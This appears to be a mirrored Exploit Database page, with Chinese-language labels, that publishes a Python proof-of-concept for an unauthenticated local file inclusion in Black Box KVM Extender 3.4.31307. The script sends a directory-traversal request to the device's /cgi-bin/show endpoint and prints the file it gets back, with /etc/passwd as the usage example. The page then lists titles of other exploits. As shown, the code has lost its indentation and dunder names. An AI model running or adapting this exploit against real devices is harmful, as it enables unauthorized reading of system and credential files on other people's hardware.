Black Box Kvm Extender 3.4.31307 – Local File Inclusion

Exploit Database
11 阅读

作者： Ferhat Çil

日期： 2021-07-06
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/50100/

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath

import requests
import sys

if name == 'main':
if len(sys.argv) == 3:
url = sys.argv[1]
payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
r = requests.get(payload)
print(r.text)
else:
print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')

last Exploits
Black Box Kvm Extender 3.4.31307 – Local File Inclusion的更多信息

PHPfileNavigator 2.3.3 – Privilege Escalation：
Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 – XML External Entity Injection：
Ovidentia Widgets 1.0.61 – Remote Command Execution：
Simple Chatting System 1.0.0 – Arbitrary File Upload：
Joomla! Component JV Comment 3.0.2 – ‘id’ SQL Injection：
INVOhost – SQL Injection：
SynaMan 4.0 build 1488 – SMTP Credential Disclosure：
Joomla! Component Maian15 – ‘name’ Arbitrary File Upload：